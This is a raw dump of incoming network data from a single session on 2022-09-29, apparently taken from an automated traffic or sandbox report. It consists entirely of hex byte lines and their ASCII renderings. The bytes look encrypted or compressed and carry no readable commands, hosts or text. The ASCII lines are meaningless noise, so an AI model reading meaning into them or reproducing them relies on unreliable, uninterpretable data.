                                                                                                        2022-09-29 12:45:44 UTC6406INData Raw: 85 a0 c2 b4 20 a8 80 b0 3a a3 31 4e 78 86 b3 eb e6 8f 7a 85 f2 f3 ef 13 fd 83 f2 1d e7 95 da 88 67 1a 58 fe 8e 9d 5c 18 e6 90 b4 74 37 ac db ce 64 90 23 c2 3f 96 21 e0 b4 fc 63 97 ae 59 dc 29 d1 d7 48 be de 70 ce 16 b0 a3 b5 4d 71 f0 ca 2c 1e 5e 14 7c 36 76 e7 4a ce 0d df bb f9 2e 7a e9 89 d8 f4 59 45 9b 44 bd ee 44 3c b1 23 cb 4d 1c f0 ad ce 56 2f 4e 75 fa 28 9a 10 0a 2c 59 fe af 5f 26 14 7a 17 23 f9 8f eb fe 00 cb 5e 9b 0d 59 ea cc 8a f6 f1 17 b2 30 7a 76 4f 7a f6 f3 e1 43 3f c8 97 6f 0d b8 be c7 6a 23 9c 19 6b 80 eb 9a b1 01 c7 8e 5f 23 cb 02 b5 f8 be 8a ed 1b ac 8a 60 44 95 02 da 40 92 ce b9 e0 4b 9e e1 2f 52 3e 11 ad 56 d0 c2 62 cf a2 bb 0e 4f 8e 7e 6d 70 cf 48 b1 96 1e 11 cf ca a1 65 ea 9a 3e 02 5f bb 67 89 9b a8 69 29 36 d6 18 f7 46 db 18 f0 00 d6
                                                                                                        Data Ascii: :1NxzgX\t7d#?!cY)HpMq,^|6vJ.zYEDD<#MV/Nu(,Y_&z#^Y0zvOzC?oj#k_#`D@K/R>VbO~mpHe>_gi)6F
                                                                                                        2022-09-29 12:45:44 UTC6422INData Raw: 63 55 14 f9 f0 7c 1f 63 24 cd 9e 9b bb 5c a7 16 77 d7 25 7b 11 36 5d 8c ce cb 2a 4f 3e b5 c4 b5 81 e0 b1 2d 1d d4 33 3e e2 fa f8 8a 7f e5 76 4d ab 28 20 39 ac 79 56 c8 68 af a7 f9 72 93 d0 67 17 45 37 f8 96 85 1b f3 5e 0c be cf 8e f7 63 7d eb 87 97 7e df d6 1c 63 76 36 a8 80 4e 58 bb 06 f3 c6 e9 9d 62 5d 58 42 20 c3 69 47 82 ab 39 64 e4 c7 47 83 3c 1e f6 d3 16 01 bf d0 2d 0c 37 58 0f 85 ef 43 57 5a 5e dc 0d e1 e5 f3 62 fc 15 0c b4 f4 5e 3b 17 b8 16 9d 76 4e 6d b0 19 00 d4 69 4a b9 92 05 1a 22 16 ac 8b c0 23 df 1e 65 ec 3f c6 3a 9c af f4 ff c5 bf 16 5f 50 1e c1 b8 59 17 2e bb 9f c4 d1 c5 9a 0c cf 4c ac 3e 50 85 f9 c1 b0 5e 31 44 6b 6c ca 03 0a 36 36 1a 42 9a cf c5 a8 90 5e 6c 1b 87 83 d9 07 31 7b cf a5 93 dd fe 41 03 06 f0 33 f2 25 4d e3 a0 12 d4 b2 73 b1
                                                                                                        Data Ascii: cU|c$\w%{6]*O>-3>vM( 9yVhrgE7^c}~cv6NXb]XB iG9dG<-7XCWZ^b^;vNmiJ"#e?:_PY.L>P^1Dkl66B^l1{A3%Ms
                                                                                                        2022-09-29 12:45:44 UTC6438INData Raw: fe 69 c8 b0 8f 0a db 5f fa b7 d3 52 9e 3f 5d 2b 30 40 47 5f 97 0b 6c 35 55 0f 31 8d 62 0d ee 9e 38 74 89 fc b8 a5 ad 84 19 91 bf a1 41 9d e7 df 5b 09 c2 72 0d 9d ac 44 61 34 f9 61 72 38 18 20 c2 45 3a 0c 59 74 d5 86 d6 59 23 08 5f c6 c1 ff b1 92 1a c5 e7 db 42 43 b8 6d 7b 8b 8c 0f 2b 7f 64 38 0c e7 b4 5c f8 1f 24 1b 35 8a f9 aa 07 95 e9 85 b6 74 49 bb b6 73 12 68 e4 38 25 36 4e ba 50 83 46 53 c0 0b 76 cc 98 79 31 82 74 b2 79 c3 83 ec e1 ad eb 89 e2 14 a0 6c 2b e0 3e 9a e3 e5 8d 3e 07 bb 98 07 6a 75 3c bb e1 ae 76 79 0e c7 36 8f 43 52 a1 9a 89 0d 37 74 76 54 9c d2 6a ca e7 0b e8 d4 2b 21 c5 b5 6a 63 4c b4 cb aa 1d 1b 56 a9 5a 10 f4 fb 32 48 b8 58 a4 04 b1 e6 61 84 60 b6 6e f4 24 e7 2d 82 8b 06 a0 1b 25 f6 e9 4a 21 bd e2 4a b0 27 5a 75 be e0 4a fd d3 03 29
                                                                                                        Data Ascii: i_R?]+0@G_l5U1b8tA[rDa4ar8 E:YtY#_BCm{+d8\$5tIsh8%6NPFSvy1tyl+>>ju<vy6CR7tvTj+!jcLVZ2HXa`n$-%J!J'ZuJ)
                                                                                                        2022-09-29 12:45:44 UTC6454INData Raw: c9 ab 6b 93 de ea 82 f7 07 52 08 88 1e cb d3 85 15 f4 23 17 b2 70 cc 2b f1 3c 08 f9 2e 2e 8b e2 87 1c 15 87 97 d8 b7 40 0e 37 ae d5 40 7f 57 a8 6c 22 34 23 58 04 b2 81 1f 62 c9 db 16 6c df 0d 00 23 18 c1 39 3f 5e b6 40 ec 31 24 0f 51 a3 d1 c2 ed 15 fa 6e d8 1c 35 32 09 a5 d3 63 49 43 c1 3b 3d 44 a2 85 83 84 58 6a 7f 80 67 ba cf f3 a7 ba 6b d1 32 b6 ad 94 3e 1a da 04 a0 d6 92 9c 38 2e 83 2d d2 13 c4 17 ad 75 63 71 db 52 cc 4a 68 74 67 05 9b 2f 8a 3c 13 d7 55 66 58 09 fb 62 70 a1 ca a2 6a 89 37 21 bf 41 ee 4c 83 a0 e8 a7 10 17 d4 c6 00 b1 45 da 5c 3d 8e 96 b9 3c b2 92 35 c3 19 fd f6 23 18 c4 8a 16 d4 70 24 76 3a 44 12 30 9f 50 d8 71 64 4a 67 75 8d fe 4f 6a c1 ee ec f4 9f ce 15 d2 7a e3 f5 6a c2 1a 41 51 a3 f5 f9 7f 7c 7b 70 66 06 ec f1 d7 4d e2 72 1c eb c1
                                                                                                        Data Ascii: kR#p+<..@7@Wl"4#Xbl#9?^@1$Qn52cIC;=DXjgk2>8.-ucqRJhtg/<UfXbpj7!ALE\=<5#p$v:D0PqdJguOjzjAQ|{pfMr
                                                                                                        2022-09-29 12:45:44 UTC6470INData Raw: 81 9c 46 d3 a5 ac b0 96 88 e3 ac bd 92 d5 1e 05 2d 58 66 80 58 4d df 24 6e 36 d0 33 a5 b5 39 9b d7 83 ca d8 9e 2e 9d 58 21 d5 5c 00 41 89 54 74 08 4c a6 12 c0 00 ec 6c b4 0c bf ec 5d a7 7b 62 04 24 cb 4d 02 6f c7 d6 a9 b9 83 1a 71 00 e3 f3 e1 bc 25 44 69 3b 36 2e a9 f9 ee 36 47 31 c6 0a 2c 30 55 7e 8a cf 98 56 ec be 00 46 8b c1 70 d6 87 1b e4 5e 13 2d 24 1f f8 1e f4 71 94 5f 65 ad f1 cd b4 71 c3 be 5f 96 67 4b 80 be b7 13 ef 44 20 35 d3 30 fc ac 6b 35 6b 82 e9 cb 98 48 a6 df b2 9f 6f 3f 51 b0 d6 1a 63 38 1d d6 9a a6 64 de 21 10 55 78 f9 ad 89 f8 c9 3f 2b 68 c4 d0 80 5a 90 41 0d b4 d8 53 5e a5 a5 47 47 e1 17 b2 1a 5e 42 52 b9 ec b4 49 91 21 8c 74 45 cf a6 b2 eb 66 e1 73 7a cf 3e ff 59 f7 bc 93 83 76 d2 58 35 ed 04 9e 4f 63 62 12 6c 5b bb 2b 76 ce 9f ad aa
                                                                                                        Data Ascii: F-XfXM$n639.X!\ATtLl]{b$Moq%Di;6.6G1,0U~VFp^-$q_eq_gKD 50k5kHo?Qc8d!Ux?+hZAS^GG^BRI!tEfsz>YvX5Ocbl[+v
                                                                                                        2022-09-29 12:45:44 UTC6486INData Raw: a7 01 5c 70 7b 0a 20 94 5b cd 9d 96 7c 3f 77 c0 3f 7f b1 0e 37 2e d9 33 5c f2 62 c0 50 86 b7 65 40 ca 96 db 3d be a4 95 42 c5 fc 6a 27 60 83 3f a4 4e 84 dc 7f cf 10 0d 3b 80 b7 c7 f1 c6 be 20 22 dd 6f d6 28 2f 42 da 90 df 0f 79 77 cd a3 bb c7 39 f8 39 09 c2 d9 16 f3 f2 ba 34 ea 98 8a ec fe 68 f8 73 bd 3f 38 a6 6b a9 1e c3 ad 7d 59 b0 34 b8 90 b9 00 56 2c 2b 01 51 b4 03 5b 3d 9c d7 e5 34 f5 62 16 17 ce 02 f6 91 ed a8 1f ec da 60 d8 10 b8 bb 52 90 50 23 5f 18 49 57 c9 f5 6c 71 db 0d 0b 9c 52 fa 1e db 5b 8a 9c 7f ae 31 4d 05 e9 33 de ae 96 97 e8 24 9d f9 80 be 3f 80 80 f8 aa cd 0e 3c 33 c5 04 2e db 02 af e7 70 fd a9 02 fe 95 ba 0b 25 05 d8 87 dc 28 6a 9b 39 de b2 dd e1 90 e1 3b 55 be cb 22 7a 70 83 dc 56 5f 6a ec 41 f9 fe eb 46 74 08 00 ea 23 07 d4 ea 3c f8
                                                                                                        Data Ascii: \p{ [|?w?7.3\bPe@=Bj'`?N; "o(/Byw994hs?8k}Y4V,+Q[=4b`RP#_IWlqR[1M3$?<3.p%(j9;U"zpV_jAFt#<
                                                                                                        2022-09-29 12:45:44 UTC6502INData Raw: 2b 46 e6 89 54 ca 18 d0 80 9e 41 e8 d9 46 58 2e c8 89 3f 26 f7 19 c5 ce cb d8 a2 78 4b 49 8e cf 2a 80 7f 43 fc 72 a5 1c 13 8a a8 b5 e6 e7 8d eb 25 f3 29 e7 a6 e0 31 bc ca a2 93 2f 2d 24 e2 8a 7d 92 71 87 af b1 a4 e8 29 64 71 85 25 cc f9 5e 51 41 6e c8 a5 c2 54 f3 96 50 09 58 d7 45 2d 53 d4 02 02 02 b8 48 c0 ed fc 00 08 bc 4f 42 9c f5 19 15 cb 07 7b 47 67 9b b1 a5 a4 43 74 95 28 9c 02 8e bd 6f 67 bf 59 d2 e1 36 22 65 0f e3 1a fe 27 38 ca 63 2f c3 99 cb 0f ad ab 8f bc 81 c1 df cd 5d 96 ca 27 7b 88 57 46 6f 7c 71 e0 3f cd a1 34 83 c0 b1 c1 7f 63 c4 24 01 a1 cd 84 d0 28 5a ee ad ed a4 37 13 4c 7b 6a 3b d9 56 16 bb 5c c7 89 12 41 73 a8 75 12 4c 9e d5 8b 07 3f b3 23 39 74 84 ec 8a 6b 59 8f f9 22 cc bf 1a f1 c4 86 9f 65 2c ce 4d 01 28 14 e1 15 e5 b5 6a fb 91 80
                                                                                                        Data Ascii: +FTAFX.?&xKI*Cr%)1/-$}q)dq%^QAnTPXE-SHOB{GgCt(ogY6"e'8c/]'{WFo|q?4c$(Z7L{j;V\AsuL?#9tkY"e,M(j
                                                                                                        2022-09-29 12:45:44 UTC6518INData Raw: 76 95 26 a7 d0 e0 20 46 d7 a4 fa 40 13 69 11 74 e4 10 1c f5 2c 22 a7 dd 8a aa 01 87 cb 12 e4 ca a1 25 ff d9 8f 0d 10 e0 41 4a 38 6c 65 21 7e 82 be 02 00 f5 73 fd 99 b2 24 75 99 d5 2c 24 34 7a d8 11 fb b5 32 03 15 b8 88 70 ea fa b5 20 7d 3a 26 47 0f 76 77 3c a0 14 d7 71 51 bb df 80 cc 2a 06 d9 53 f0 1b d6 6d e8 fd 0d 7a e6 b7 62 10 f5 cb 11 cb 04 a8 cf 5c 18 9b db 0f ea 75 71 de a2 4e 3f b7 c1 eb 2b f6 e8 54 4d 0e 08 e1 fe 27 6f f9 bf 02 d7 8f b7 b3 cb e9 17 2c 05 ce a1 79 5c d5 4f ab f5 a7 84 d9 c9 07 be a8 60 93 bd 35 06 5b 31 9c 2d ae d8 55 7d ab e0 d3 bb 19 ee 78 85 0a 37 d1 02 9a a2 f1 a1 c8 0d 82 43 57 38 4c 27 da 2e b3 69 2e 10 5c dd 9e 89 df 0c 96 28 36 7f 00 b9 09 cd 4d d4 50 08 4f 66 8c e7 97 74 c8 bf cd 34 f0 e4 0a 67 59 d4 71 39 e8 16 98 6b 12
                                                                                                        Data Ascii: v& F@it,"%AJ8le!~s$u,$4z2p }:&Gvw<qQ*Smzb\uqN?+TM'o,y\O`5[1-U}x7CW8L'.i.\(6MPOft4gYq9k
                                                                                                        2022-09-29 12:45:44 UTC6534INData Raw: a8 4e 7b fc 75 3e 02 b1 df d8 23 3c 81 06 cb 52 e0 01 cd 1a 3a 83 d6 09 58 6a 17 2d 43 59 18 d3 69 bb 61 92 ac 28 58 c2 be d2 66 45 eb 1f 85 6b d1 09 d5 c9 a5 95 b7 26 51 25 ab 1c aa 1b 74 90 0a 4a e2 de 3e 0a d8 56 36 f8 47 cf 45 7a a3 6f 9f 18 b1 af 13 e3 20 78 62 a6 30 f6 16 d9 35 16 5f 77 e1 6e 94 d3 92 a8 cc fb 1a c5 c6 c3 75 91 89 2c c8 a7 db e9 47 5c fb c5 24 0f 1e c6 ee 07 3e 14 48 6c e8 9e 9c a2 cd 75 4f 30 8e c3 bc 55 9d e1 9f 20 10 1d 15 ae b0 7c f4 9c ad d2 af 75 fc 1c ee d3 07 f9 ca 8f 2b 43 37 d4 d8 99 97 c0 8c 9d 8c c8 04 94 6e a6 2b ce ca e6 b1 7a a9 ac 91 f5 89 f2 c2 54 dd 44 43 3f 6a 52 c5 71 0b 5f 33 a9 59 cf db ed b9 7d b3 e5 ea 97 6d 11 3b a5 f4 0d e8 e4 c8 14 1c 08 69 75 e4 9e c8 15 ee 45 7d ad 39 e4 03 33 c2 bf 66 ed cb 2b 86 d6 d6
                                                                                                        Data Ascii: N{u>#<R:Xj-CYia(XfEk&Q%tJ>V6GEzo xb05_wnu,G\$>HluO0U |u+C7n+zTDC?jRq_3Y}m;iuE}93f+
                                                                                                        2022-09-29 12:45:44 UTC6550INData Raw: 8d ad af 4b 93 5e 83 2a a0 5c 36 7a fd d9 78 fd 3a eb fa c5 3a 59 16 d3 28 2f 54 79 aa 61 79 30 2e c0 0d 7a e4 7e 3a 81 4f 57 b2 0e ab 6a ec f0 93 4f 1f a3 81 bb 14 0a 6a fa 26 d2 19 48 94 4a 51 18 c4 1f 27 56 ae c2 24 d4 42 f4 b7 9e 2f fc 9b 80 5b 03 9f 42 2f 29 d0 8c e4 df 95 56 b9 24 81 3e db 16 fc 8f 0f da 58 4f 3d 16 bf e5 8d 64 c8 be 2e 70 67 c6 b3 d2 04 51 68 45 1f e9 83 29 fb 50 83 60 ea 07 1b 04 6e c1 31 2e 57 8d 9e 45 ac 90 8c d4 32 54 4b 31 4d 6c 2b d8 03 e8 bd 1a 91 aa fe 86 07 8b 96 e7 50 b3 3b 20 20 fa b8 c5 ad 40 68 65 d6 50 d6 d5 7d c2 1e fd 11 85 05 40 6e 48 f6 ef 76 70 49 ce 15 7a ed b4 b6 ae f2 94 b9 c3 2c 03 ab cd 18 de fb 52 7d eb 52 ba 97 52 a7 5f 38 b3 12 4f 6b ef 12 69 c4 a0 7a 38 86 e1 30 6a c5 a1 98 b3 43 75 49 94 22 0c 45 c0 1f
                                                                                                        Data Ascii: K^*\6zx::Y(/Tyay0.z~:OWjOj&HJQ'V$B/[B/)V$>XO=d.pgQhE)P`n1.WE2TK1Ml+P; @heP}@nHvpIz,R}RR_8Okiz80jCuI"E
                                                                                                        2022-09-29 12:45:44 UTC6566INData Raw: 62 50 07 d3 d1 b9 1d 78 92 b6 75 02 e4 fc 12 12 ff 61 5b 79 b6 91 2e 6f 7e ed 31 c8 9f a0 ac 87 d2 9a 0e 49 e0 a7 f2 5c b6 5d 58 78 1a 6c 7e 1f 0f ba b5 89 a7 fa ad c0 39 eb 40 fa 59 a3 04 b1 ce e3 df e4 a4 da 9e 51 af 89 c2 99 a6 65 c8 f4 af 30 fc 89 3a 68 79 85 8a 2e c0 7f 84 ee b7 56 c7 0e 50 5f 61 df 16 88 50 a6 d9 0e af d2 37 01 cd a1 66 f3 9d 02 26 fb 3f 91 2a d5 b2 ef e9 78 2a d5 7b 11 9f f8 b7 9f ef 76 b5 b0 cd c4 16 f6 fe 8a 68 ef 50 5e 58 f5 8d a1 d0 4d ee f4 6f 01 97 ea a3 ae a2 b6 28 a8 93 ea 3b ec 85 7a 0b c7 25 80 35 b4 65 83 5b 86 0f 16 43 ed d2 d6 a9 b7 01 69 91 43 eb 46 88 da 8e 2e bf 5d 6b 16 ad fe 3c 8a d2 09 c3 da 50 54 3c 68 3f 67 cf 1e 53 b1 d9 44 5a 25 63 b0 31 cf f8 2d c1 a8 e1 d6 cf 4a a8 10 20 d2 3a 69 f7 e4 9a 40 57 d9 2c f3 27
                                                                                                        Data Ascii: bPxua[y.o~1I\]Xxl~9@YQe0:hy.VP_aP7f&?*x*{vhP^XMo(;z%5e[CiCF.]k<PT<h?gSDZ%c1-J :i@W,'
                                                                                                        2022-09-29 12:45:44 UTC6582INData Raw: b4 81 c9 62 46 b9 59 9e 0e 37 12 be 5f f7 ef b9 e4 c5 63 df dc 63 da 87 ca 19 a3 4e 3a 72 26 8e ac 32 f5 e4 58 d3 24 be 19 94 e7 e3 c6 17 11 1e e8 ec e9 00 e7 76 da 9b 23 d4 69 e0 9a 5a dd 12 95 7d a9 60 56 45 c5 c4 93 4a d8 d4 5f 95 2f 51 13 23 5d 77 b2 2c 31 df bc 32 bd 75 05 95 09 4f 98 df fb f3 de c6 25 40 be 5e b4 d7 99 80 0e e0 6e 6f 44 b8 09 05 11 70 1d f1 cc 2b 75 98 4b 0e db b8 44 0f fb 3a eb 76 f6 5b 95 88 80 74 f9 c0 65 7e 9d 0f 5a 46 92 5f 79 87 21 a1 04 11 f3 9f 80 7b 3d 33 87 16 e4 76 ec f1 b9 26 95 04 f9 61 fd 98 89 b4 ac 86 20 39 fb 36 06 a0 d5 3d 87 85 5b 14 85 4f c1 34 d0 81 df 62 f0 e6 eb c5 94 a5 9d 26 61 f4 1e ed bb 75 6d 90 6a a7 ad 4f c0 da f8 e6 32 bb b3 c5 1a 43 af bb 78 4b f3 28 24 3a 6d 3e c8 d9 ca 0a 11 12 d5 16 28 94 5a 0d 7a
                                                                                                        Data Ascii: bFY7_ccN:r&2X$v#iZ}`VEJ_/Q#]w,12uO%@^noDp+uKD:v[te~ZF_y!{=3v&a 96=[O4b&aumjO2CxK($:m>(Zz
                                                                                                        2022-09-29 12:45:44 UTC6598INData Raw: b2 5e 92 79 88 1a 98 a2 65 a8 5c 11 74 a0 7f 80 ab 7c 8b 2a 25 f5 a9 e4 2c 60 2a 7d 39 a3 74 d1 25 ed 07 c7 cf 6b c0 b1 7c 8d 1e c1 49 1e 6b 7e df c2 c3 ac 95 93 73 ae c3 f4 0a 22 f9 ed 0c 35 54 44 fe 6f 27 84 6d 65 7e 36 f6 3f 8b 9d 30 39 b5 d0 ca ba 5a d5 2e d3 b6 f4 a5 b6 ef de 05 d7 a3 8b 71 79 f3 1f 3a 03 21 21 e2 a9 d7 d6 24 28 c4 65 70 e9 26 ab 0e 2d c7 7b 26 db ce 6a 8e 02 82 2f 72 92 74 5f d8 4c 45 ac ec 86 07 a4 70 4f 7c a4 b9 27 a4 30 a3 56 49 ab 3f 4e 94 d9 05 0d 01 e7 ca 68 69 cb 8a 36 e0 5f 08 0b 40 13 26 f4 6c 1e f5 6f a2 23 72 ac bf 95 53 0a 98 c5 a2 2d 85 0b 5c 35 35 3d 46 c3 a4 c8 3c 52 17 6a 4b ac 9c 01 88 94 39 30 00 61 21 51 1d 64 80 8b 7d 70 8b c8 d2 69 9d 7a b7 82 d7 5b b6 8a 28 79 e0 1f 2f b1 f4 87 90 52 12 5b 87 ae 70 4f e7 03 be
                                                                                                        Data Ascii: ^ye\t|*%,`*}9t%k|Ik~s"5TDo'me~6?09Z.qy:!!$(ep&-{&j/rt_LEpO|'0VI?Nhi6_@&lo#rS-\55=F<RjK90a!Qd}piz[(y/R[pO
                                                                                                        2022-09-29 12:45:44 UTC6614INData Raw: a1 59 bd ee 52 19 70 45 92 a1 55 68 a9 b9 01 e7 67 1c 7c 59 10 77 b7 ff 3e 09 91 b3 2b 96 8f a2 74 e3 a6 97 b0 5c 6d 78 56 e5 b6 78 26 fa e0 d5 43 3a 6b c0 b2 cd 94 2c dd c2 63 18 89 74 27 2d 3a f0 9e a3 7d 28 67 fc e1 bc 0d fa 8f 09 22 78 3c be d3 3f d2 86 c2 db bb e1 13 c3 41 15 cb 96 19 1d 5b 8c bb 92 ed a8 3a 36 09 1c 6e 52 5d 69 a2 7c 37 c8 b1 79 a4 d7 27 a0 45 e1 89 c0 5e 9d a5 d8 9c d7 87 60 12 ea eb be d3 ba 02 d8 22 64 92 d2 5e be 0b 70 c2 a7 8a c7 10 e0 97 2d db d0 b1 ac 13 10 b5 8f 9a 94 8b 0a f3 26 d0 d3 d3 5b af 47 95 54 a0 4e 04 48 61 e5 b5 2a 85 1f 8a ed 33 fa c2 12 61 16 2a 48 d4 20 d0 bb 15 97 b3 3d 94 23 18 b6 10 45 20 a4 57 6c 80 ba 67 11 50 7e 9c 8f 0a 7c 82 39 a3 c6 5b 7c 6f a8 dc 24 65 63 f3 01 ad c3 3d 62 2e 63 0a 36 f5 40 68 53 ca
                                                                                                        Data Ascii: YRpEUhg|Yw>+t\mxVx&C:k,ct'-:}(g"x<?A[:6nR]i|7y'E^`"d^p-&[GTNHa*3a*H =#E WlgP~|9[|o$ec=b.c6@hS
                                                                                                        2022-09-29 12:45:44 UTC6630INData Raw: 96 e9 f7 a9 78 28 29 ef ea 6d eb f5 9f 33 60 f9 02 ca 74 45 95 77 62 7d d4 f8 d4 dc 27 60 fa 89 5d 20 a2 f9 3b 2a d6 e0 3d 7f 73 a0 08 c9 04 eb 3e 07 7e f3 5d 45 11 bd 8c 94 e8 39 fc 57 e8 3c f4 d2 f8 4d e9 e5 9d cf 32 26 b1 d9 89 c4 ee f5 47 4d d6 ba 0b ce 05 5d 99 e8 45 d1 49 8a 47 16 03 aa e9 b0 33 c3 53 e0 58 9f a5 61 73 c5 2e df a1 b1 c1 09 f3 58 73 37 81 df 11 2b dc 38 f5 1f 31 bc 89 b7 93 da ee 7d 25 d5 72 07 f2 08 72 09 f9 81 9b aa 1c 68 4e 98 f1 24 28 a5 8e ef e6 f3 90 ce a6 c1 79 bd 35 85 3a c8 82 21 e4 9d cb 73 09 56 f5 e7 b1 22 1a b1 b8 63 c9 1f a1 be c7 8a bd 77 4f 55 25 92 ac c4 70 28 93 9f 58 b9 e9 13 3e 44 7f c2 4f fb f1 bf 6f 27 fd 1e 0a 96 bf 7b 44 d1 d5 ba 90 55 2d 58 37 68 b0 60 f3 09 a3 91 46 0b de 62 ab 50 c7 d2 50 63 56 9a 84 ae 2a
                                                                                                        Data Ascii: x()m3`tEwb}'`] ;*=s>~]E9W<M2&GM]EIG3SXas.Xs7+81}%rrhN$(y5:!sV"cwOU%p(X>DOo'{DU-X7h`FbPPcV*
                                                                                                        2022-09-29 12:45:44 UTC6646INData Raw: 4d 7d 9a 7b 64 9e ae c8 92 de a2 64 d0 99 1f 52 44 e7 6d e6 80 89 0d c9 f6 fd 55 d1 12 95 43 92 15 24 72 71 c8 ca 11 95 ca 08 3f 2a 08 c4 93 fb 54 96 e6 8b b8 be fb 2b d0 5b f9 af a3 e3 df 20 90 da e3 82 2d 2c 3d 2b a2 93 67 8e e3 19 28 07 95 88 b4 38 32 65 9c b2 2f 13 40 3e 8d 8b 5a b2 0a 04 a0 59 e0 c1 02 6d 60 d2 0a f0 e6 50 d2 47 7d c6 db f3 a0 2c f5 3d a4 ae f1 b8 6f 42 72 8f 07 f6 6c c8 a4 8c 48 c0 a0 9e f7 c3 e7 14 78 70 5a ff a6 a1 9a 52 9d 86 69 31 ba 28 34 c7 b9 03 be 4e a5 58 25 3d cd b9 c8 79 33 93 06 38 7d f6 f2 b5 b0 20 c2 d9 4b de b8 37 2e 6b ef fa dc a0 78 a2 c9 6d 2d 8f 88 2e 46 cd b9 1e 7c 19 c1 66 51 33 67 77 73 47 41 1f 29 02 ea a2 cd be f4 a6 a5 f2 80 2f 57 88 44 54 ef 5c c6 2c 3f 1b 2f be 9c 0f b5 dd 9f e8 87 b6 3e 85 a0 23 f0 8d 0f
                                                                                                        Data Ascii: M}{ddRDmUC$rq?*T+[ -,=+g(82e/@>ZYm`PG},=oBrlHxpZRi1(4NX%=y38} K7.kxm-.F|fQ3gwsGA)/WDT\,?/>#
                                                                                                        2022-09-29 12:45:44 UTC6662INData Raw: 56 cb 89 0a 99 2c 60 ea 79 1a b0 96 eb 52 77 85 e5 8e b8 0f 2f ca ce 3c 4d 02 c3 a8 fa 03 e6 25 2b db 76 a6 31 f9 1a 90 54 da 3f 33 81 cb 39 73 dc 64 79 27 8b a1 cb cf 08 82 28 04 28 d2 92 cd 13 bb e2 6b ea f3 c5 a0 8b 01 3e 32 86 fc 8a bc c1 a9 0b df 1e 9f 7e 9b f5 e9 01 f9 27 b7 0c c4 dc 7d 06 71 e6 14 63 a7 01 fa f1 df a0 a3 ac eb 7f f9 14 d9 88 af 9d d2 61 6f ac 7a ef ef bc fe 56 9c 12 71 83 e6 25 1e e3 05 01 e0 b8 e8 fe e3 68 fb 9b e3 76 87 cf 24 93 76 2e f3 5f c8 47 10 c8 9c 53 e9 7f 98 10 be 61 c1 9f 40 5d d8 f1 32 8f c4 f4 dc 1d f6 d7 af db a2 71 4c 0a 75 f1 2e 6a 07 a3 23 d7 50 15 cd 7d c8 07 1a 69 03 00 8e 3b 92 cb ca 2f 08 d8 a5 83 79 a1 67 11 45 36 3e 7d e5 d5 cd 49 f0 71 02 e2 f7 e8 e3 a0 b2 d6 1c 6f 08 95 c5 a0 e6 6b 9e 9c 05 c3 fe c6 01 36
                                                                                                        Data Ascii: V,`yRw/<M%+v1T?39sdy'((k>2~'}qcaozVq%hv$v._GSa@]2qLu.j#P}i;/ygE6>}Iqok6
                                                                                                        2022-09-29 12:45:44 UTC6678INData Raw: e9 23 83 2d d1 15 dd 0a 2b 55 11 5a 19 82 6d 75 a0 06 a8 2d ac dd 59 e8 f4 d3 47 02 9f e6 c3 24 f5 7c f5 9f 9c 2b dd 62 be d6 14 d3 4b 95 6a 2a b8 60 78 f3 db 3c e8 eb f5 51 fe a0 02 b8 e3 46 5e 7d 52 ee d3 62 0b 32 cd 9f 8b de 3e 0a ab d3 16 4a ae 8a 23 21 31 39 ab b1 07 35 5e ee 37 de d2 db 7c bd 3d 0e 73 09 a8 ba c8 8f ab 43 c5 b4 9d af 19 67 92 ad 94 ed e3 24 d1 b9 08 b3 68 52 91 5e ae 3e 0c ec 49 b2 ad b0 a0 1c bf 9c df f4 e7 04 b0 a8 ef 08 be 6e ed b9 77 24 25 3d 91 13 3c a1 da c7 e8 4f e5 0f e2 1d 77 0e 49 c0 83 64 84 d4 9f 09 8f 6a 5d 72 66 7b 65 d3 48 b1 e5 7c 59 d6 00 e9 fc 4f e3 a7 1e e6 dc a5 12 e6 5a 65 d0 22 b0 fe 2f 06 a8 36 ff 01 3c 78 0a 81 9d 1f 66 7e cc 7a f0 ed 60 7c d8 cc 22 bf 8b 7e ca 27 bd 56 5d 8b 4c 3c 0c b9 34 56 2a b4 d5 02 96
                                                                                                        Data Ascii: #-+UZmu-YG$|+bKj*`x<QF^}Rb2>J#!195^7|=sCg$hR^>Inw$%=<OwIdj]rf{eH|YOZe"/6<xf~z`|"~'V]L<4V*
                                                                                                        2022-09-29 12:45:44 UTC6694INData Raw: e5 4e a5 98 c6 bf 33 1f e7 ca fb 39 8e dc fc 4e b4 73 7e 90 36 39 5e d0 28 c2 02 7b 22 43 45 7f 71 6a ee 9f 98 13 fa 3d 4e fb 59 e0 4a a6 af c9 06 f9 d4 56 a3 1f 5e 51 87 bd a0 f3 74 95 06 f1 5a 14 7b 40 35 bc 8a c9 06 c8 4d 2a 77 1a 1b a5 ee a4 1d 66 c6 66 87 22 2d 99 61 4b 3e 20 93 d1 62 aa 37 6b ab a2 04 12 c0 17 5b 3f 93 27 1f 0d cc ed 68 0b 91 7e 02 b6 9a 47 d5 2a 0f 6d cf 8d af 42 1e 24 04 21 f7 10 0c ba ad 05 9b cc 7f 77 48 21 dc 49 c6 9e 33 d7 27 2c 30 10 60 2b a6 7a 9d b9 16 ff 90 96 a3 46 ab 8a 0f 1f 0d d0 60 c4 f9 c6 8f a7 8b 56 10 5e fe d9 9e 7f 3e b9 79 a5 62 5d fe 32 10 5e 69 68 91 68 4e af 47 02 18 f2 a7 a0 91 77 3e 79 17 77 4a ee a5 f7 af c6 26 e3 27 69 87 9b 79 76 4e a2 7a e1 b3 1f 25 51 30 84 f2 d9 bb 57 9d 76 e3 be f0 a4 4a 31 08 80 f1
                                                                                                        Data Ascii: N39Ns~69^({"CEqj=NYJV^QtZ{@5M*wff"-aK> b7k[?'h~G*mB$!wH!I3',0`+zF`V^>yb]2^ihhNGw>ywJ&'iyvNz%Q0WvJ1
                                                                                                        2022-09-29 12:45:44 UTC6710INData Raw: d9 f8 cd 80 ff 17 b5 69 cc 25 b9 df c4 a1 18 48 df d7 91 d9 43 3b 8c 5e 96 24 84 35 1c 88 6d 29 26 04 5d 55 51 f1 d5 9a 67 3a 01 c1 d9 49 3a a8 d8 b9 08 4d 26 a5 50 64 e9 83 aa 8f c0 15 06 5e c6 0f 07 57 22 63 ac d5 65 75 2e db 84 12 29 f0 41 e0 07 3f fa a0 ff 99 c4 fc f6 29 b8 ad f8 eb 60 ed 12 11 1d 6b 0a 35 71 46 3c 50 8d 8d f2 27 45 09 9d 60 8c 65 cd 70 e7 42 5d 73 77 13 2f ef e2 7d 61 1f 07 60 28 ca 15 ea e4 5f c7 a0 04 ca 5e a4 96 3c e6 42 81 f5 9e a1 a7 be 16 21 5c 75 e8 16 a7 44 d7 cc eb f4 0c 97 39 cb 01 01 1d 5a 81 65 29 1a cb c3 a1 91 45 6f 1b 68 98 ee 02 bb 